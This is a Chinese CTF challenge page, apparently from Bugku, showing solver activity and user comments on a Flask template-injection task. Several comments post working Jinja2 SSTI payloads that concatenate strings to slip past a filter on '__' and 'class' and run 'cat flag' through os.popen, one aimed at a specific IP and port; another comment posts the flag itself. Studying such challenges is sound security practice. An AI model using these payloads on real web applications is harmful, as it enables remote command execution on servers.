评分(0)
暂无评分
解题动态
julianus 攻破了该题 2天前
gfzt 攻破了该题 14天前
wywitkey 攻破了该题 19天前
nakanodarling 攻破了该题 1月前
oohyodec 攻破了该题 1月前
kaiyafanfan123 攻破了该题 1月前
kingmaster123 攻破了该题 1月前
梦游的小狐狸 攻破了该题 1月前
forces 攻破了该题 2月前
yuloong 攻破了该题 2月前
蟹堡王第一厨师长 攻破了该题 3月前
花落时相遇 攻破了该题 3月前
19189756057 攻破了该题 3月前
下雨天y 攻破了该题 4月前
minshenyao 攻破了该题 4月前
dir_tree 攻破了该题 4月前
pancras 攻破了该题 4月前
ckasdfg 攻破了该题 4月前
Linyuan0624 攻破了该题 5月前
评论
nakanodarling 1月前
举报
fenjing
yaozhiwang 7月前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 1年前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 1年前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 1年前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 1年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 1年前
举报
爆出传参search,利用字符串拼接绕过